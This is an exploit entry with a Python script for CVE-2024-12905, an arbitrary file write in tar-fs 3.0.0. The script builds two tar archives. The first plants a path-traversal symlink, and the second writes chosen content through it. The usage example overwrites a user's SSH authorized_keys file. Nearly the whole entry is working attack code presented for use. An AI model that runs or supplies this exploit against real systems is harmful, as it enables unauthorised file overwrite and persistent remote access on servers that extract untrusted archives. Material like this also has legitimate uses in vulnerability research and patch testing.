📄 tar-fs 3.0.0 Arbitrary File Write

# Exploit Title: tar-fs 3.0.0 - Arbitrary File Write/Overwrite
    # Date: 17th April, 2024
    # Exploit Author: Ardayfio Samuel Nii Aryee
    # Software link: https://github.com/mafintosh/tar-fs
    # Version: tar-fs 3.0.0
    # Tested on: Ubuntu
    # CVE: CVE-2024-12905
    
    
    # Run the command: Example: python3 exploit.py authorized_keys ../../../../../../../../home/user1/authorized_keys
    # This will generate two tar file: stage_1.tar and stage_2.tar
    # Upload stage_1.tar first to unarchive the symlink
    # Next, upload stage_2.tar to finally write/overwrite the file on the system
    
    
    import os
    import sys
    import tarfile
    
    link_name = "normal_file"
    
    def check_arguments():
        if len(sys.argv) != 3:
            print(f"Usage: {sys.argv[0]} <path_to_file_contents> <path_to_target_file_to_overwrite>\n\
    Example: {sys.argv[0]} authorized_keys ../../../../../../../../home/user1/authorized_keys\
            ")
            sys.exit()
        content_file_path = sys.argv[1]
        target_file_path = sys.argv[2]
    
        return content_file_path, target_file_path
    
    def create_symlink(link_name, target_path):
        os.symlink(target_path, link_name)
        print("[+] Created symlink: {link_name} -> {target_path}")
    
    def archive_files(archive_name, file_path):
        tar = tarfile.open(archive_name, 'w')
        tar.add(file_path, link_name, recursive=False)
        tar.close()
        print(f"[+] Archived to: {archive_name}")
    
    def main():
        content_path, target_file = check_arguments()
    
        stage_1_archive_name = "stage_1.tar"
        stage_2_archive_name = "stage_2.tar"
    
        create_symlink(link_name, target_file)
    
        archive_files(stage_1_archive_name, link_name)
        archive_files(stage_2_archive_name, content_path)
    
    if __name__ == "__main__":
        main()